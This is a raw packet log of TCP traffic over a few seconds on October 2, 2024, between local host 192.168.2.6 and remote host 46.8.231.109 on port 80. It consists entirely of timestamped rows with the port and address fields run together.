                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856576920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856594086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856604099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.856636047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862487078 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862521887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862530947 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862534046 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862545967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862559080 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862569094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862571001 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862581015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862608910 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862624884 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862658978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862670898 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862683058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862692118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862692118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862708092 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862726927 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862742901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862754107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862763882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862773895 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862775087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862801075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862829924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862925053 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862936020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862946987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862957954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862962961 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862968922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862979889 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.862994909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.863022089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870277882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870316029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870327950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870341063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870371103 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870376110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870388031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870399952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870412111 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870412111 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870441914 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870513916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870524883 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870537043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870556116 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870573997 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870625973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870636940 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870649099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870671034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870697021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870824099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870834112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870845079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870856047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870866060 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870871067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870882988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870893002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870896101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870909929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.870929003 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871057987 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871069908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871084929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871097088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871098042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871109962 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871119976 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.871149063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.996108055 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.001002073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.198261023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.201689959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.287826061 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.292779922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.491866112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.492172956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.951056957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.955933094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:09.154352903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:09.154413939 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.330142975 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.335042000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505001068 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505019903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505032063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505057096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505095959 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505099058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505112886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505124092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505141020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505165100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505397081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505418062 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505429029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505458117 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505466938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505490065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505513906 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505517006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505528927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505554914 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.505569935 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.506139040 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.506179094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.506186962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.506190062 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.506215096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.506227970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585110903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585125923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585135937 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585169077 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585197926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585201025 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585212946 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585223913 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585233927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585251093 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585254908 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585262060 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585266113 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585292101 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585314989 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585344076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585355043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585366964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585395098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585417032 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585417986 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585481882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585483074 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585491896 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585522890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585530043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585532904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585545063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585561037 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585586071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585618973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585630894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585640907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585656881 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585683107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585709095 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585719109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585746050 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585766077 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585944891 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.585983992 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586008072 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586018085 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586055040 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586076021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586086988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586097956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586126089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.586138964 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665594101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665616989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665627956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665664911 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665698051 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665718079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665730000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665740013 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665750980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665760040 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665760994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665776968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665781021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665786982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665807009 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665827990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665832043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665841103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665853977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665864944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665891886 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665910959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665920973 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665952921 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665956974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665967941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665977955 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.665997028 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666024923 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666033983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666044950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666054010 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666069984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666086912 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666095018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666105986 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666117907 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666140079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666167974 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666176081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666184902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666191101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666201115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666219950 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666244030 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666254997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666265965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666275978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666294098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666320086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666321993 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666333914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666343927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666363001 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666383982 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666413069 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666421890 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666430950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666440010 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666452885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666466951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666476965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666486025 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666486979 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666511059 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666532040 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666548967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666559935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666568995 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666591883 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666618109 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666763067 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666773081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666783094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666805029 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666816950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666826963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666830063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666857004 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666868925 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666897058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666908026 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666913033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666968107 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.666994095 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667006016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667016029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667041063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667052984 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667613029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667700052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667728901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667738914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667757034 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667768002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667778015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667778015 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667804003 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.667815924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.746912956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.746929884 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.746941090 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.746952057 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:10.746963978 CEST805851546.8.231.109192.168.2.6
